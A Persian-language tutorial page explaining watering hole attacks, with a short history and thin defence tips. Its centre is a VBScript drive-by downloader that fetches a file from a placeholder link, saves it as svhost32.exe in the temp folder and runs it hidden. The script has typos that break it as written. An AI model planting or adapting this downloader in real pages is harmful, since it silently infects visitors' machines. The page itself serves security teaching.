آشنایی با حمله Watering Hole

Watering Hole
تصویر شاخص

watering hole چیست؟

به زبان آمیانه،حمله گودال آب یا چاله آب به حمله ای گفته می شود که هکرها با ایجاد حفره های آبی برای قربانی سعی دارند با اجرای اسکریپتی به صورت کاملا مخفیانه قربانی را به سمت آن گودال هایت کنند و از این طریق به سیستم قربانی نفوذ کنند.

حمله Watering Hole یا چاله آب و یا گودال آب نوعی حمله سایبری می باشد که به وسیله گروه مجرمین اینترنتی Elderwood و در سال ۲۰۱۲ ایجاد شد. این گروه از طریق این حمله موفق به آلوده نمودن بیش از پانصد شرکت در طی ۲۴ ساعت شدند. این حملات در سال ۲۰۱۲ توسط RSA Security کشف شد.

در حمله Watering hole، هکر از از تارگت موردنظر اطلاعات جمع آوری می کند. برای مثال وب سایت هایی که قربانی از آنها زیاد بازدید می کند از جمله: (سایت پیش بینی وضع هوا، اخبار روز و..)

در قدم بعدی، پس از شناسایی آن صفحات پربازدید هکرها با ایجاد یک گودال آب به شناسایی آسیب پذیری های این صفحات برای تزریق کد مخرب به تبلیغات، آگهی ها و غیره می پردازند.

که در ادامه نمونه ای از این سورس کد ها را خواهیم دید.

				
					<script language="VBScript">
on error resume next
dl = " لینک تروجان یا فایل مخرب مورد نظر اینجا وارد می شود "
set df = document.crateELement("object")
df.setattribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
set x = df.createObject(str,"")
a1="Ado"
a2="db"
a3="str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl , False
x.Send
fname1="svhost32.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpaecialFolder(2)
fname1 = F.Buildpath(tmp,fname1)
S.open
d.write X.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("shell.application","")
Q.ShellExecute fname1,"","",open",0
</script>
				
			

تحلیل کد ذکرشده

این اسکریپت در قسمت بالای تگ <body> قرار می گیرد. در نتیجه، هنگامی که قربانی به صفحه مخرب موردنظر مراجعه می کند، یک اسکریپت به طور خودکار و مخفی اجرا می شود که در آن ممکن است یک فایل با هرپسوندی از (جمله exe) دانلود و به صورت مخفیانه اجرا شود و درنهایت در قسمت startup ویندوز قرار گیرد.

راه های مقابله با این نوع حملات

برای اطمینان بیشتر همیشه قبل از مراجعه به هرصفحه ای ،آن آدرس را در سایت Virustotal تست نمایید.

استفاده از آنتی ویروس معتبر همراه برای مثال (Kaspersky,F-secure) با لایسنس اوریجینال و بروز رسانی منظم آن یکی از راهکارهای موثر است

دیدگاهتان را با ما درمیان بگذارید
تعداد دیدگاه : 0
امتیاز کلی : 0.0
پیشنهاد شده توسط : 0 کاربر
بر اساس 0 فروش
0
0
0
0
0

هیچ دیدگاهی برای این محصول نوشته نشده است.

لطفا پیش از ارسال نظر، خلاصه قوانین زیر را مطالعه کنید:

فارسی بنویسید و از کیبورد فارسی استفاده کنید. بهتر است از فضای خالی (Space) بیش‌از‌حدِ معمول، شکلک یا ایموجی استفاده نکنید و از کشیدن حروف یا کلمات با صفحه‌کلید بپرهیزید.

نظرات خود را براساس تجربه و استفاده‌ی عملی و با دقت به نکات فنی ارسال کنید؛ بدون تعصب به محصول خاص، مزایا و معایب را بازگو کنید و بهتر است از ارسال نظرات چندکلمه‌‌ای خودداری کنید.
اولین نفری باشید که دیدگاهی را ارسال می کنید برای “آشنایی با حمله Watering Hole”

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

قیمت دوره

رایگان

تعداد
امتیازی ثبت نشده است
سطح آموزش مقدماتی
تعداد دانشجو : 0
تاریخ انتشار: ۱۶ اسفند ۱۴۰۰آخرین بروزرسانی: 17 فروردین 1401تعداد بازدید: 236
قوانین و مزایای استفاده

  • دسترسی به فایل محصول به صورت مادام‌العمر
  • تضمین کیفیت آموزش ها
  • فعال‌سازی آنی لینک دانلود، پس از ثبت سفارش
  • فروش فقط از طریق آکادمی نتکا
  • به صورت رایگان یک یا چند آموزش را دریافت می کنید.
مدرس

حامد نوری ( امنیت شبکه )

کارشناس حوزه امنیت شبکه و امنیت اطلاعات

قیمت دوره

رایگان

تعداد